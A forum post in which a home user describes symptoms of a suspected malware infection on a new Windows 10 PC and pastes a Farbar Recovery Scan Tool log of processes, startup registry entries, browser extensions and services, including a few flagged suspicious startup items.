Just to start with I am not very sophisticated about processes and systems, but not a complete novice regarding computers.
I have a three week old Lenovo Ideacentre with windows 10 running 64 bit. I do use Office 365 and Skype for Business so I am wondering if I am infected with something or if there is some kind of conflict between 32 bit and 64 bit programs? I did pick up a virus that I think came through Skype that kept resetting my microphone to mute. It seems I picked this up within a week of having my new computer. I was running McAfee, but just switched to Norton. McAfee found the microphone virus (unsure of name) after I did a scan for it, but neither have found any issue related to the current symptoms which are:
1. Error saying CPU usage at 99% due to file C:\Windows\SysWOW64\regsvr32.exe
2. Alert about a high amount of outgoing traffic.
3. In downloading large data files or using on-line mapping/statistics programs, computer keeps locking up. I perform all of these tasks on my 3 year old Lenovo W350 without locking up.
4. CPU usage constantly maxed until I open task manager.
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:16-06-2016 01
Ran by Jennifer JonesSantos (administrator) on DESKTOP-LPO4RMB (16-06-2016 16:20:31)
Running from C:\Users\Jennifer JonesSantos\Desktop
Loaded Profiles: Jennifer JonesSantos (Available Profiles: Jennifer JonesSantos)
Platform: Windows 10 Home Version 1511 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Logitech, Inc.) C:\Program Files\Logitech\SolarApp\L4301_Solar.exe
(Intel Corporation) C:\Windows\SysWOW64\IntelCpHeciSvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
() C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe
(Lenovo) C:\Program Files (x86)\Lenovo\LenovoPortal\FastBoot\FbService.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
() C:\Program Files (x86)\Lenovo\LenovoPortal\LenovoPortalService.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Windows ® Win 7 DDK provider) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe
() C:\Program Files (x86)\Intel\Intel® RealSense Application Recommender\SUR\SurSvc.exe
() C:\Program Files\update\UpdateAgent.exe
(Intel® Corporation) C:\Program Files (x86)\Common Files\Intel\RSDCM\bin\win32\RealSenseDCM.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Lenovo Group Limited) C:\Program Files (x86)\Lenovo\ImController\PluginHost\Lenovo.Modern.ImController.PluginHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\\GoogleCrashHandler64.exe
(Lenovo Group Limited) C:\Program Files (x86)\Lenovo\ImController\PluginHost\Lenovo.Modern.ImController.PluginHost.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Apple Inc.) D:\iTunesHelper.exe
(Logitech, Inc.) C:\Program Files\Logitech\SetPointP\SetPoint.exe
(Logitech, Inc.) C:\Program Files\Common Files\Logishrd\KHAL3\KHALMNPR.exe
(Google) C:\Program Files (x86)\Google\Drive\googledrivesync.exe
(Google) C:\Program Files (x86)\Google\Drive\googledrivesync.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Google, Inc) C:\Users\Jennifer JonesSantos\AppData\Local\Programs\Google\Google Photos Backup\Google Photos Backup.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe
(Wondershare) C:\Program Files (x86)\Wondershare\TunesGo\TunesGoSevice.exe
(Wondershare) C:\Program Files (x86)\Wondershare\TunesGo\TunesGoSevice.exe
() C:\Program Files (x86)\Intel\Intel RealSense Training F200\Intel RealSense F200 Tray\Intel RealSense F200 Tray.exe
(CyberLink) C:\Program Files (x86)\Lenovo\Power2Go\CLMLSvc.exe
(Intel Corporation) C:\Program Files (x86)\Common Files\Intel\RSDCM\bin\win32\RealSenseInfo.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Lenovo Silver Silk Wireless Keyboard\skd8861.exe
(Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat 2015\Acrobat\acrotray.exe
(CyberLink Corp.) C:\Program Files (x86)\Lenovo\PowerDVD12\PDVD12Serv.exe
() C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\esrv.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security\Engine\\ns.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security\Engine\\ns.exe
(Lenovo) C:\Program Files\Lenovo\Lenovo Solution Center\LSCNotify.exe
() C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\esrv_svc.exe
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security\Engine\\conathst.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
==================== Registry (Whitelisted) ===========================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [1795704 2015-11-29] (NVIDIA Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [16404224 2015-10-01] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1407744 2015-10-01] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_LENOVO_MICPKEY] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1407744 2015-10-01] (Realtek Semiconductor)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-01-07] (Adobe Systems Incorporated)
HKLM\...\Run: [iTunesHelper] => D:\iTunesHelper.exe [176952 2016-06-01] (Apple Inc.)
HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3113592 2015-08-25] (Logitech, Inc.)
HKLM-x32\...\Run: [CLMLServer] => C:\Program Files (x86)\Lenovo\Power2Go\CLMLSvc.exe [103720 2009-12-04] (CyberLink)
HKLM-x32\...\Run: [UpdateP2GoShortCut] => C:\Program Files (x86)\Lenovo\Power2Go\MUITransfer\MUIStartMenu.exe [214312 2011-12-06] (CyberLink Corp.)
HKLM-x32\...\Run: [Intel® RealSense SDK info server] => C:\Program Files (x86)\Common Files\Intel\RSDCM\bin\win32\RealSenseInfo.exe [21144 2015-10-15] (Intel Corporation)
HKLM-x32\...\Run: [Lenovo Silver Silk Wireless Keyboard] => C:\Program Files (x86)\Lenovo\Lenovo Silver Silk Wireless Keyboard\skd8861.exe [1742336 2013-08-14] (Lenovo)
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 2015\Acrobat\Acrotray.exe [1866936 2016-05-26] (Adobe Systems Inc.)
HKLM-x32\...\Run: [] => [X]
Winlogon\Notify\LBTWlgn: c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll (Logitech, Inc.)
HKU\S-1-5-21-4252830516-2523568588-2152128588-1002\...\Run: [GoogleDriveSync] => C:\Program Files (x86)\Google\Drive\googledrivesync.exe [23496872 2016-05-17] (Google)
HKU\S-1-5-21-4252830516-2523568588-2152128588-1002\...\Run: [Google Update] => C:\Users\Jennifer JonesSantos\AppData\Local\Google\Update\GoogleUpdate.exe [152216 2016-05-19] (Google Inc.)
HKU\S-1-5-21-4252830516-2523568588-2152128588-1002\...\Run: [Google Photos Backup] => C:\Users\Jennifer JonesSantos\AppData\Local\Programs\Google\Google Photos Backup\Google Photos Backup.exe [3790936 2016-04-08] (Google, Inc)
HKU\S-1-5-21-4252830516-2523568588-2152128588-1002\...\Run: [Lync] => C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe [22779584 2016-05-26] (Microsoft Corporation)
HKU\S-1-5-21-4252830516-2523568588-2152128588-1002\...\Run: [Adobe Acrobat Synchronizer] => C:\Program Files (x86)\Adobe\Acrobat 2015\Acrobat\AdobeCollabSync.exe [880312 2016-05-26] (Adobe Systems Incorporated)
HKU\S-1-5-21-4252830516-2523568588-2152128588-1002\...\Run: [TunesGoService] => C:\Program Files (x86)\Wondershare\TunesGo\TunesGoSevice.exe [16384 2016-05-06] (Wondershare)
HKU\S-1-5-21-4252830516-2523568588-2152128588-1002\...\Run: [Zoom] => 0
HKU\S-1-5-21-4252830516-2523568588-2152128588-1002\...\Run: [**aghux<*>] => "C:\Users\Jennifer JonesSantos\AppData\Local\49b833e\8b9e42a.lnk" <===== ATTENTION (Value Name with invalid characters)
ShellIconOverlayIdentifiers: [ GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-05-17] (Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-05-17] (Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-05-17] (Google)
ShellIconOverlayIdentifiers: [ OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton Security\Engine64\\buShell.dll [2016-02-18] (Symantec Corporation)
ShellIconOverlayIdentifiers: [ OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton Security\Engine64\\buShell.dll [2016-02-18] (Symantec Corporation)
ShellIconOverlayIdentifiers: [ OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton Security\Engine64\\buShell.dll [2016-02-18] (Symantec Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RealSense Training.lnk [2016-02-17]
ShortcutTarget: RealSense Training.lnk -> C:\Program Files (x86)\Intel\Intel RealSense Training F200\Intel RealSense F200 Tray\Intel RealSense F200 Tray.exe ()
Startup: C:\Users\Jennifer JonesSantos\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5349d1f.lnk [2016-06-09]
ShortcutTarget: 5349d1f.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Tcpip\Parameters: [DhcpNameServer]
Tcpip\..\Interfaces\{78f74676-cfe3-4b59-91a8-bceba3bec0f6}: [DhcpNameServer]
Internet Explorer:
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-4252830516-2523568588-2152128588-1002\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-4252830516-2523568588-2152128588-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://lenovo15.msn.com/?pc=LCTE
HKU\S-1-5-21-4252830516-2523568588-2152128588-1002\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://www.lenovo.com
HKU\S-1-5-21-4252830516-2523568588-2152128588-1002\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = hxxp://www.lenovo.com
SearchScopes: HKU\.DEFAULT -> DefaultScope {D168CCAB-85DC-44B4-A9D5-F11CF0BE6464} URL =
SearchScopes: HKU\.DEFAULT -> {D168CCAB-85DC-44B4-A9D5-F11CF0BE6464} URL =
SearchScopes: HKU\S-1-5-21-4252830516-2523568588-2152128588-1002 -> DefaultScope {D168CCAB-85DC-44B4-A9D5-F11CF0BE6464} URL =
SearchScopes: HKU\S-1-5-21-4252830516-2523568588-2152128588-1002 -> {D168CCAB-85DC-44B4-A9D5-F11CF0BE6464} URL =
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2016-05-26] (Microsoft Corporation)
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security\Engine64\\coIEPlg.dll [2016-02-21] (Symantec Corporation)
BHO: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\2015\x64\AcroIEFavStub.dll [2016-04-26] (Adobe Systems Incorporated)
BHO: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll [2015-08-25] (Logitech, Inc.)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2016-05-26] (Microsoft Corporation)
BHO: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\2015\x64\AcroIEFavStub.dll [2016-04-26] (Adobe Systems Incorporated)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2016-05-26] (Microsoft Corporation)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security\Engine\\coIEPlg.dll [2016-02-21] (Symantec Corporation)
BHO-x32: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\2015\AcroIEFavStub.dll [2016-04-26] (Adobe Systems Incorporated)
BHO-x32: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll [2015-08-25] (Logitech, Inc.)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL [2016-05-26] (Microsoft Corporation)
BHO-x32: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\2015\AcroIEFavStub.dll [2016-04-26] (Adobe Systems Incorporated)
Toolbar: HKLM - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\2015\x64\AcroIEFavStub.dll [2016-04-26] (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\2015\AcroIEFavStub.dll [2016-04-26] (Adobe Systems Incorporated)
Toolbar: HKU\S-1-5-21-4252830516-2523568588-2152128588-1002 -> Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\2015\x64\AcroIEFavStub.dll [2016-04-26] (Adobe Systems Incorporated)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-05-26] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-05-26] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-05-26] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-05-26] (Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2015-07-29] (Adobe Systems)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-12-18] ()
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-05-26] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\4.0.50401.0\npctrl.dll [2010-04-01] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-05-26] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\\npGoogleUpdate3.dll [2016-05-19] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\\npGoogleUpdate3.dll [2016-05-19] (Google Inc.)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 2015\Acrobat\Air\nppdf32.dll [2016-05-26] (Adobe Systems Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2013-05-10] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2015-07-29] (Adobe Systems)
FF Plugin HKU\S-1-5-21-4252830516-2523568588-2152128588-1002: @ringcentral.com/RingCentralMeetingsPlugin -> C:\Users\Jennifer JonesSantos\AppData\Roaming\RingCentralMeetings\bin\nprcmsplugin.dll [2016-05-16] (Zoom Video Communications, Inc. and RingCentral Inc.)
FF Plugin HKU\S-1-5-21-4252830516-2523568588-2152128588-1002: @tools.google.com/Google Update;version=3 -> C:\Users\Jennifer JonesSantos\AppData\Local\Google\Update\\npGoogleUpdate3.dll [2016-05-19] (Google Inc.)
FF Plugin HKU\S-1-5-21-4252830516-2523568588-2152128588-1002: @tools.google.com/Google Update;version=9 -> C:\Users\Jennifer JonesSantos\AppData\Local\Google\Update\\npGoogleUpdate3.dll [2016-05-19] (Google Inc.)
FF HKLM\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.5.2.15\coFFAddon
FF Extension: Norton Identity Safe - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.5.2.15\coFFAddon [2016-06-16]
FF HKLM-x32\...\Firefox\Extensions: [
[email protected]] - C:\Program Files (x86)\Adobe\Acrobat 2015\Acrobat\Browser\WCFirefoxExtn
FF Extension: Adobe Acrobat DC - Create PDF - C:\Program Files (x86)\Adobe\Acrobat 2015\Acrobat\Browser\WCFirefoxExtn [2016-06-02]
FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt
FF Extension: Logitech SetPoint - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2016-06-04] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.5.2.15\coFFAddon
CHR StartupUrls: Default -> "hxxps://www.google.com/#gws_rd=ssl","hxxp://www.npr.org/","hxxp://www.orlandosentinel.com/","hxxps://portal.office.com/Home","hxxps://app.smartsheet.com/b/home","hxxp://www.udsmapper.org/"
CHR DefaultSearchURL: Default -> hxxps://nortonsafe.search.ask.com/web?q={searchTerms}&o=APN11908&prt=cr
CHR DefaultSearchKeyword: Default -> NortonSafe
CHR DefaultSuggestURL: Default -> hxxp://ss-sym.ask.com/query?q={searchTerms}&sstype=prefix&li=ff
CHR Profile: C:\Users\Jennifer JonesSantos\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\Jennifer JonesSantos\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-06-02]
CHR Extension: (Google Docs) - C:\Users\Jennifer JonesSantos\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-06-02]
CHR Extension: (Google Drive) - C:\Users\Jennifer JonesSantos\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-06-02]
CHR Extension: (YouTube) - C:\Users\Jennifer JonesSantos\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-06-02]
CHR Extension: (Norton Security Toolbar) - C:\Users\Jennifer JonesSantos\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe [2016-06-16]
CHR Extension: (Logitech Smooth Scrolling) - C:\Users\Jennifer JonesSantos\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkpejdfnpdkhifgbancbammdijojoffk [2016-06-04]
CHR Extension: (Adobe Acrobat) - C:\Users\Jennifer JonesSantos\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2016-06-02]
CHR Extension: (Google Sheets) - C:\Users\Jennifer JonesSantos\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-06-02]
CHR Extension: (Google Docs Offline) - C:\Users\Jennifer JonesSantos\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-06-02]
CHR Extension: (Save to Google Drive) - C:\Users\Jennifer JonesSantos\AppData\Local\Google\Chrome\User Data\Default\Extensions\gmbmikajjgmnabiglmofipeabaddhgne [2016-06-04]
CHR Extension: (Norton Identity Safe) - C:\Users\Jennifer JonesSantos\AppData\Local\Google\Chrome\User Data\Default\Extensions\iikflkcanblccfahdhdonehdalibjnif [2016-06-16]
CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\Jennifer JonesSantos\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2016-06-02]
CHR Extension: (Screencastify (Screen Video Recorder)) - C:\Users\Jennifer JonesSantos\AppData\Local\Google\Chrome\User Data\Default\Extensions\mmeijimgabbpbgpdklnllpncmdofkcpn [2016-06-14]
CHR Extension: (Norton Safe) - C:\Users\Jennifer JonesSantos\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmgcfemagnogdodbambjhdcmfcpicngl [2016-06-16]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Jennifer JonesSantos\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-06-02]
CHR Extension: (Share to Circles) - C:\Users\Jennifer JonesSantos\AppData\Local\Google\Chrome\User Data\Default\Extensions\nnlomafmkpiclmaaekkhpoecnclldmaa [2016-06-02]
CHR Extension: (Gmail) - C:\Users\Jennifer JonesSantos\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-06-02]
CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Security\Engine\\Exts\Chrome.crx [2016-06-16]
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-4252830516-2523568588-2152128588-1002\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Security\Engine\\Exts\Chrome.crx [2016-06-16]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
==================== Services (Whitelisted) ========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2021592 2016-04-05] (Adobe Systems, Incorporated)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-03-02] (Apple Inc.)
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [315472 2015-09-23] (Windows ® Win 7 DDK provider)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2945792 2016-05-26] (Microsoft Corporation)
S3 cplspcon; C:\Windows\system32\IntelCpHDCPSvc.exe [604280 2016-01-12] (Intel Corporation)
R2 DAX2API; C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe [176640 2015-09-15] () [File not signed]
R2 ESRV_SVC_WILLAMETTE; C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\esrv_svc.exe [416408 2016-03-09] ()
R2 FastbootService; C:\Program Files (x86)\Lenovo\LenovoPortal\FastBoot\FbService.exe [298232 2016-02-17] (Lenovo)
R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [354936 2016-01-12] (Intel Corporation)
R2 ImControllerService; C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [56144 2016-05-26] (Lenovo Group Limited)
R2 L4301_Solar; C:\Program Files\Logitech\SolarApp\L4301_Solar.exe [405744 2013-01-30] (Logitech, Inc.)
R2 LenovoPortalService; C:\Program Files (x86)\Lenovo\LenovoPortal\LenovoPortalService.exe [24312 2016-02-17] ()
S3 LSC.Services.SystemService; C:\Program Files\Lenovo\Lenovo Solution Center\App\LSC.Services.SystemService.exe [273232 2016-04-20] (Lenovo)
R2 NS; C:\Program Files (x86)\Norton Security\Engine\\NS.exe [289080 2016-02-26] (Symantec Corporation)
S3 ose; C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE [200240 2016-05-25] (Microsoft Corporation) [File not signed]
